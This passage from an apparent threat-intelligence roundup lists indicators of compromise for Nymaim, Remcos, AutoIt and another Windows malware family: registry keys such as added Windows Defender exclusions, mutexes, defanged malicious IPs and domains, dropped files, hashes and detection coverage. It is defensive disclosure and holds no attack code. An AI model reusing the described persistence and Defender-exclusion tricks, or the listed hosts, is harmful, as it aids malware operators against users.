\n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Type ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Start ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ErrorControl ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: DisplayName ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: WOW64 ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ObjectName ` | 18 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: Description ` | 18 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config0 ` | 18 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config1 ` | 18 \n`<HKU>\\.DEFAULT\\CONTROL PANEL\\BUSES \nValue Name: Config3 ` | 17 \n`<HKU>\\.DEFAULT\\CONTROL 
PANEL\\BUSES \nValue Name: Config2 ` | 17 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\<random, matching '[A-Z0-9]{8}'> \nValue Name: ImagePath ` | 13 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\haoutbhw ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\fymsrzfu ` | 3 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\nguazhnc ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\unbhgouj ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\ibpvucix ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\exlrqyet ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\wpdjiqwl ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\tmagfnti ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\zsgmltzo ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\slzfemsh ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS DEFENDER\\EXCLUSIONS\\PATHS \nValue Name: C:\\Windows\\SysWOW64\\mftzygmb ` | 1 \nMutexes | Occurrences \n---|--- \n`sejavpsfushosuk` | 7 \n`None` | 4 \nIP Addresses contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`69[.]55[.]5[.]252` | 18 \n`85[.]114[.]134[.]88` | 18 \n`239[.]255[.]255[.]250` | 17 \n`192[.]0[.]47[.]59` | 17 \n`46[.]28[.]66[.]2` | 17 \n`78[.]31[.]67[.]23` | 17 \n`188[.]165[.]238[.]150` | 17 \n`93[.]179[.]69[.]109` | 17 \n`176[.]9[.]114[.]177` | 17 \n`172[.]217[.]197[.]26/31` | 16 \n`172[.]217[.]7[.]132` | 16 \n`168[.]95[.]5[.]112/31` | 15 \n`46[.]4[.]52[.]109` | 14 \n`43[.]231[.]4[.]7` | 14 \n`209[.]85[.]202[.]26/31` | 13 \n`98[.]136[.]96[.]92/31` | 13 \n`67[.]195[.]204[.]72/30` | 13 \n`216[.]146[.]35[.]35` | 12 \n`211[.]231[.]108[.]46/31` | 12 \n`12[.]167[.]151[.]116/30` | 12 \n`67[.]195[.]228[.]86/31` | 12 \n`168[.]95[.]6[.]56/29` | 12 \n`64[.]233[.]186[.]26/31` | 11 \n`192[.]0[.]56[.]69` | 11 \n`96[.]114[.]157[.]80` | 10 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`microsoft-com[.]mail[.]protection[.]outlook[.]com` | 18 \n`252[.]5[.]55[.]69[.]in-addr[.]arpa` | 18 \n`schema[.]org` | 17 \n`whois[.]iana[.]org` | 17 \n`whois[.]arin[.]net` | 17 \n`252[.]5[.]55[.]69[.]zen[.]spamhaus[.]org` | 17 \n`252[.]5[.]55[.]69[.]bl[.]spamcop[.]net` | 17 \n`252[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org` | 17 \n`252[.]5[.]55[.]69[.]cbl[.]abuseat[.]org` | 17 \n`252[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net` | 17 \n`bestladies[.]cn` | 16 \n`bestdates[.]cn` | 16 \n`bestgirlsdates[.]cn` | 16 \n`sex-finder4you1[.]com` | 16 \n`eur[.]olc[.]protection[.]outlook[.]com` | 14 \n`aol[.]com` | 13 \n`mx-aol[.]mail[.]gm0[.]yahoodns[.]net` | 13 \n`hotmail-com[.]olc[.]protection[.]outlook[.]com` | 13 \n`smtp[.]secureserver[.]net` | 12 \n`mx-eu[.]mail[.]am0[.]yahoodns[.]net` | 11 \n`msa[.]hinet[.]net` | 11 \n`myibc[.]com` | 11 \n`ipinfo[.]io` | 10 \n`hotmail[.]fr` | 10 \n`mx1[.]comcast[.]net` | 10 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\config\\systemprofile` | 18 
\n`%SystemRoot%\\SysWOW64\\config\\systemprofile:.repos` | 18 \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-z]{8}'>` | 18 \n`%TEMP%\\<random, matching '[a-z]{8}'>.exe` | 18 \n`%HOMEPATH%` | 14 \n`%System32%\\<random, matching '[a-z]{8}\\[a-z]{6,8}'>.exe (copy)` | 14 \n`%TEMP%\\kjzvcyd.exe` | 1 \n \n#### File Hashes\n\n` 005ac256dddc3a368386cf19e2c8ff4ff897453e13d31c2a002389b1b8f6f0e6 0225cfc00d03fb8135dab6acdbb2165f678c8693927dd4e8180b7ddfa8bdcbae 2ecaa4a4541645f3d329b65981f97403c3a3cc2bf77feeecef4cc5108e5eb649 357ed9b86a1c594596641c650bce143f7d58f42c6c67fd508168389805eb2739 3ce3671481b73bf71782605b8e6429753a3c7a253b6ff8dd0c80af28eb881633 53210cdce3d628a61c5aed9fcad723d30634f6df74a8118183f9bfa8ba0b643e 53b68915686769a14855c37ad232b86f7d982d7c88e74ff641f1046612e04011 57917ee62c89309f3ac65a67ef6b3e983c2b882a9770e43b0095edb348ae9cb4 7e8a5dedb5852ba8f9f3970c0204657611bb7b3e8009c019e7105b7528111403 8f1d942a42022e2ad2c7ea175e742fc83785883df3e32e2f696cccb1785f9b04 9f23b12abc917fd84e47626f4695a2f811352dcf100224623dbb1343c2503bd2 a55ef46691eeebb5afe92223a87d8fa1332dc8406d5933d6dbadfebbea6708cc b833f9b5e15ceb0e9553dba19386e5f9420795251c499aee1f4dde3c19ae5571 bae92bcf28992f8a71f9216af418f3a38ca58435b0be6e9e998ba30680a9aa49 cf5208d9d87f44c5adc6cb07f050fa11693654384840cbf3f8ef6c7bcb299c39 d8cb668abbc88169df7393ef917f8214b53192c1cac6e372f46f048416fffe89 e29f7b44dbc846b438af94610b75f5d091ea15308536dfa337bf8c27bc80acdd e60fa6d29dcbac234244922ed994abff1e02a63ca62bdd7efb1393a1c22052c5 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-8Kq23Qa1778/XlAWqtd6NLI/AAAAAAAADV8/fiphdVkZgcIcuayjrNb6owB3HW_Kp5yqACLcBGAsYHQ/s1600/d8cb668abbc88169df7393ef917f8214b53192c1cac6e372f46f048416fffe89_amp.png>)\n\n \n\n\n#### 
ThreatGrid\n\n[](<https://1.bp.blogspot.com/-QRkfMrevaBw/XlAWv-azupI/AAAAAAAADWA/kIoAMlzXIv4RXqxEWVZhwiu_BoX8rP8ngCLcBGAsYHQ/s1600/d8cb668abbc88169df7393ef917f8214b53192c1cac6e372f46f048416fffe89_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-Wyi1S0kwqv4/XlAW0uC8U9I/AAAAAAAADWE/AgVUp_QzAtcRQ7e7APZMKYN_rQsK5L-DgCLcBGAsYHQ/s1600/effb9e9a8eedfc5d51c94309cc0df29e70e376d245d9446e05f4fd1789dd6dc1_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Nymaim-7586870-1\n\n#### Indicators of Compromise\n\n * IOCs collected from dynamic analysis of 25 samples\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\KPQL ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER \nValue Name: GlobalAssocChangedCounter ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\GOCFK \nValue Name: mbijg ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\KPQL \nValue Name: efp ` | 25 \nMutexes | Occurrences \n---|--- \n`Local\\{2D6DB911-C222-9814-3135-344B99BBA4BA}` | 25 \n`Local\\{369514D7-C789-5986-2D19-AB81D1DD3BA1}` | 25 \n`Local\\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}` | 25 \n`Local\\{D8E7AB94-6F65-71DE-8DA1-FE621BE2E606}` | 25 \n`Local\\{F04311D2-A565-19AE-AB73-281BA7FE97B5}` | 25 \n`Local\\{F6F578C7-92FE-B7B1-40CF-049F3710A368}` | 25 \n`Local\\{445DE72D-9B60-6571-D392-6925F65F5FE7}` | 25 \n`Local\\{E41B13B6-7B07-8560-4026-41A66FCE339D}` | 25 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`46[.]4[.]52[.]109` | 1 \n`93[.]179[.]69[.]109` | 1 \n`78[.]31[.]67[.]23` | 1 \n`176[.]9[.]114[.]177` | 1 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`neawce[.]in` | 24 \n`cawugh[.]pw` | 24 \n`bfjtkee[.]in` | 24 \n`xnexvlnlm[.]in` | 24 \n`xirvjdkza[.]pw` | 24 \n`njzcxk[.]in` | 24 \n`ozbpuhdibrq[.]in` | 24 \n`kniqbngezi[.]net` | 24 \n`pbgtihnv[.]com` | 24 \n`gxdawu[.]net` | 24 \n`gxvim[.]com` | 19 \n`nkkzhqqslod[.]com` | 19 \n`tiuzomycjp[.]com` | 19 \n`wzfhxytur[.]net` | 19 \n`cdnnoeem[.]net` | 19 \n`qlqywqinnnof[.]net` | 19 \n`upfqangse[.]net` | 19 \n`cxtuswfapphv[.]net` | 19 \n`vgazbwj[.]net` | 19 \n`apdkokb[.]net` | 19 \n`xknfwgwvcut[.]net` | 19 \n`jwieiuggex[.]com` | 19 \n`rpwecn[.]net` | 19 \n`wcafbjwj[.]com` | 19 \n`bjeuewe[.]pw` | 19 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%ProgramData%\\ph` | 25 \n`%ProgramData%\\ph\\eqdw.dbc` | 25 \n`%ProgramData%\\ph\\fktiipx.ftf` | 25 \n`%TEMP%\\gocf.ksv` | 25 \n`%TEMP%\\kpqlnn.iuy` | 25 \n`%TEMP%\\fro.dfx` | 19 \n`%TEMP%\\npsosm.pan` | 19 \n`\\Documents and Settings\\All Users\\pxs\\dvf.evp` | 19 \n`\\Documents and Settings\\All Users\\pxs\\pil.ohu` | 19 \n \n#### File Hashes\n\n` 0218e9c2cf3ca8f6201331e44bfa7d8a5448b1b5b08d8b14d85aebb65671e1a2 0454d49281ad2a9f99228f543428338353da11fbf78e36b7f5b31479c121bf6b 056dc90528fe0b52da0e2810dfecc00a33ecb3fb055d4b1887b06ab042dbae1e 09136689c46634da3d89dc3609bc2db9582cf70992b9ef92ef6c7dfb3416bee2 0a58ad96a90964d56735bf61afa86fa7c6a2a3e15092b66154c6418465bb3a00 0cbed52d77571cb00e68ca65ed017272b69c2b90b548f5a3354dec2fd4da677c 1725392d15f6eeee49ba8222c595faeb59a5434b9136b137dc03a9b61e084087 17f077b3721d13d89bfe4d84b297620ff8590b9949e0b3a90e754cd147808695 201591910712d7b75f17831436b9c2c7a5bc95e6009d7a744de0fd2fe34a1dc6 20b70cb79a5bef35145254e2c456da2d2d90f7e2de2f72d413ce0fbf844af66f 2696cc5afb7daf7e9acfa6b48e9c925961c8b3675d4dba20fcd840879695f8dd 287f5e0b40f6341f7f9b09a97d2efbb00b9c389053b76976ccade63027f02425 2b0b69fcba2279c7c731adc17ce5e395739a4d957afe75b4dffe79a911d06834 
3343d61a8a5e8f19686995852ac47dec453da1a61f0544a2b6cc75b404ac40c1 37c3c75c995da210c09a6b6e258af839386c4a8661d16395ef179065326ebbd7 39c08d0ebe20734e86539503b615716ef692aa37ba6a490e0265d1560dbae71c 3cfc8edcb512891aeb4241df6a800981d83c329883eaeeb265f5b555be7c85a4 43983a108eee5452032f21f6895cb9d930af372f4fbbf51e217a58f68412c9c4 44033bd26650bac58f19414b2f937a3d0aebd819a145738d4d9e77a087d1b2e2 446952c8181f0736647c99e3d4160fafcf272c885a62b19e4028a41183227292 473e6d64b9b5d33250f89781d2d7d0b7a763563e6703907953ae226e078b2a49 589b303963958d48a6d5aa9a506955ed04242994f1f7e36b8819463200970b21 5b186038f17adbde16e02e1e29513354112ecdc9b3a8be5fe2978696ce9541ec 5d95754de0c3bda4841e7122b0b24bd5d949adc647735582d4e6af72274950d7 6123859235132aed86f0520e20d623e8d5d0438e082db32caf310d1b77aa9ec3 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-OG-L904Vn18/XlAXHITP77I/AAAAAAAADWQ/58z-UNX2ZcwxM4f-RKL2jr3MDrATwbkqwCLcBGAsYHQ/s1600/6123859235132aed86f0520e20d623e8d5d0438e082db32caf310d1b77aa9ec3_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-czb2GTKRPog/XlAXLbX7ecI/AAAAAAAADWU/T1OGSMtUOxI1_pYlID0Q4oE2rTTvhoxsQCLcBGAsYHQ/s1600/6123859235132aed86f0520e20d623e8d5d0438e082db32caf310d1b77aa9ec3_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-8kmO8BmA0xA/XlAXQaSHx1I/AAAAAAAADWY/etbRo-kD2cwYpQMpWjXwkfdjLaAr28kOACLcBGAsYHQ/s1600/bfd8049c2e3148a9939345d4afbffca668c8fc6557ed219e0afe7fb7239757ef_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Remcos-7586925-1\n\n#### Indicators of Compromise\n\n * IOCs collected from dynamic analysis of 12 samples\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\OSRS18HD-UKGZDR ` | 12 \n`<HKCU>\\SOFTWARE\\OSRS18HD-UKGZDR \nValue Name: 
EXEpath ` | 12 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SCHEDULE\\TASKCACHE\\TASKS \nValue Name: Path ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SCHEDULE\\TASKCACHE\\TASKS \nValue Name: Hash ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SCHEDULE\\TASKCACHE\\TASKS \nValue Name: Triggers ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\SCHEDULE\\TASKCACHE\\TASKS \nValue Name: DynamicInfo ` | 1 \nMutexes | Occurrences \n---|--- \n`Remcos_Mutex_Inj` | 12 \n`OSRS18hd-UKGZDR` | 12 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`secure[.]jagexlaucher[.]top` | 12 \nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\win.ini` | 12 \n`%APPDATA%\\ErrorLogs` | 12 \n`%APPDATA%\\ErrorLogs\\logs.dat` | 12 \n`%System32%\\Tasks\\SearchUI` | 12 \n`%APPDATA%\\SearchUI.exe` | 12 \n`%SystemRoot%\\Tasks\\SearchUI.job` | 9 \n \n#### File Hashes\n\n` 08606543b261293be2c91acebdd4100b77471a2cb2f29b8f558f2d12dd01c954 2d5275f0deb740be06001aa53d8719db88d08426f2e5f1b44bc4626fcc9b0258 46835bd196f40e56dfeb8fbdbf1e328358e545649ce10aa580575874ffeba5b1 778608ebdb66b22322989f6889668d11a5c243f540d094f834743651f847f6d3 b1edb734e012c5b941e7e7190b23c472937b5332b9af826e5eb07a807c7f0e80 c0a687a74845e57c671768eac45588576a194f36165279f19edb22d45a595904 cd9d9e7f425fbc41e1c6e12e7e9ffd0d9800aa703e690802a260f5f29837967a dc789666026dacfc446d3559c0aebeab538608668fac6645ba73591d9a4ced58 dda31fb5d2659b268d9f12541f26042e626d6162c442362b362f0eb80011c741 e6d0a9641a275e95ed0835cc1c65f861f03e6643b99ef24bb1b1e6711fe6b31e ec8cc8dd06095a94275b3e3f7564dfddbcb20ce78b84da301768b0e8484482a5 f21bb31466c5f318f41c021fc459caf0e413f580ade991087bc499bb5fa2ffa7 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n 
\n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-OCZh_5WKX4A/XlAXxzi7llI/AAAAAAAADWs/l0MRwd-H_FQX9hO6h82duW602Y_udYlSACLcBGAsYHQ/s1600/08606543b261293be2c91acebdd4100b77471a2cb2f29b8f558f2d12dd01c954_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-522EmBaPe3k/XlAX2_imhbI/AAAAAAAADWw/aCBPjlPJmE4omZv-JrgBKhT-hFziXA6SQCLcBGAsYHQ/s1600/08606543b261293be2c91acebdd4100b77471a2cb2f29b8f558f2d12dd01c954_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Autoit-7586956-0\n\n#### Indicators of Compromise\n\n * IOCs collected from dynamic analysis of 25 samples\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyEnable ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyServer ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: ProxyOverride ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoConfigURL ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS \nValue Name: AutoDetect ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\CONNECTIONS \nValue Name: SavedLegacySettings ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDecisionReason ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDecision ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: 
WpadNetworkName ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A} \nValue Name: WpadDetectedUrl ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\5.0\\CACHE\\CONTENT \nValue Name: CachePrefix ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\5.0\\CACHE\\COOKIES \nValue Name: CachePrefix ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\5.0\\CACHE\\HISTORY \nValue Name: CachePrefix ` | 25 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\SCHEDULE \nValue Name: NextAtJobId ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP \nValue Name: ProxyBypass ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP \nValue Name: IntranetName ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP \nValue Name: UNCAsIntranet ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP \nValue Name: AutoDetect ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD ` | 25 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\C8-B0-99-0A-48-DD ` | 1 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\{E54C0DDD-6FAB-4796-8BBE-EE37AF7CD25A}\\C8-B0-99-0A-48-DD ` | 1 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\C8-B0-99-0A-48-DD \nValue Name: WpadDecisionReason ` | 1 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\C8-B0-99-0A-48-DD \nValue Name: WpadDecisionTime ` | 1 \n`<HKU>\\.DEFAULT\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\WPAD\\C8-B0-99-0A-48-DD \nValue Name: WpadDecision ` | 1 
\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`199[.]59[.]242[.]153` | 25 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`infikuje[.]freevnn[.]com` | 25 \n`11776[.]bodis[.]com` | 20 \nFiles and or directories created | Occurrences \n---|--- \n`\\atsvc` | 25 \n`%System32%\\winevt\\Logs\\Microsoft-Windows-Known Folders API Service.evtx` | 25 \n`%System32%\\Tasks\\At1` | 25 \n`%SystemRoot%\\Tasks\\At1.job` | 25 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat` | 25 \n`%SystemRoot%.exe` | 25 \n`\\Documents and Settings.exe` | 25 \n`\\MSOCache.exe` | 25 \n`\\PerfLogs.exe` | 25 \n`%ProgramFiles(x86)%.exe` | 25 \n`%ProgramFiles%.exe` | 25 \n`%ProgramData%.exe` | 25 \n`\\Recovery.exe` | 25 \n`\\TEMP.exe` | 25 \n`\\Users.exe` | 25 \n`%SystemRoot%\\svhost.exe` | 25 \n`\\$Recycle.Bin.exe` | 25 \n`%SystemRoot%\\Driver.db` | 25 \n`e:\\System Volume Information.exe` | 25 \n`e:\\$RECYCLE.BIN.exe` | 25 \n`\\starup.exe` | 25 \n`\\System Volume Information.exe` | 25 \n`%SystemRoot%\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\list[1].htm` | 25 \n`%SystemRoot%\\list.txt` | 25 \n`%HOMEPATH%\\Local Settings\\History\\History.IE5\\desktop.ini` | 20 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0cfd5fcfbe7dcb0ca5d046e97815d68b7afec7562255c591efaf6e6ddff04dc3 176e3815db0582a528559fcd4ac5d556d8b44354470ef7000246a7dd70e02042 188fb9f78f7b0ec6ef4ddac9d5c3e246563a9d5e4689b49c5b4be343be805be6 1e401c8be910e4f07af2e40c1c20b25be23e896e3aef6c887bc505b4ffee805a 25290bd54de5289d9ea3cbcbf59fefa0a7efa1743196043989029d3b1a3aa23f 2c52210a40af62a33415f9d5fc31cf4ed0c9d60d87dc97fa53db86c028b4a486 2db7594e73018d54e9dca34869eed6fa7e523fd519e2cdc74a32a91d31c6a945 30226cf05067f4906bec842742691778bfe2f277a3ee3ebf82ebc5a2d313806c 
32f9cec632967d84f191d9bb514409dcff9f4d8e59097e98fa72e74cbfd32ce9 3909a29ead2eb2248f107c1352e5259d244b3eda0c971b136fab7e671f63a7e2 3b2f4a185951364a131c6ece1b282f7442045063f0d00562bd1c462ddc45e8e5 433b74fd6206dcc64cdc96141263cf1fc5720f087e15ddb581b2084ba0604c1c 4544acce7aad2dc7f8ffc93815eaea59f714552a21863a70132a742e4938a852 478d53130c7b549c54401d4d1c8501a310e99a350846e0515ef8d416822d4ada 4872d9c8e75aa6ad18a1272b17c617811eff6c411f181cc450a52be747fc4d20 48d8d3219b405e7a7ac7e53dac401be58e50cc582d4d5a2c96eb3edab10a8920 4e0b6052c58992f28138a28c281c4bca93f3f90c6c14ef3b88ff697c821e3f34 520f5cfd75870100df9da88875a9d6aef2dae064901acf35695c7ea0d8f36410 56641ea2594a21e5aa25475b295b5130e49c94c78ec42d45b1aed9cf929ea300 65e7b497cebcd23ceb769656cc011a3cadfdd618657a0d66e14a63f94a113fcd 6b1821395bbba2f70b42f963dd63772d4dc97b9dcfeb13ea592ead01587c36d2 6f416a86789e81f95138751a71006189bf6e1215d8ea2063c370862738a996a3 75c38fa29ebe45c102663815d76491a566e34e404dd99088fb4257744539ed6e 78f0240b6e9c1a74546845b3d0ddfc84aecc388f8ff7d794cf80e33ae0de4c31 7f2e6da85f7ebb3dd066315504735c8dbcc4cdbc9c24d7d944cdeeb09df1c869 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### 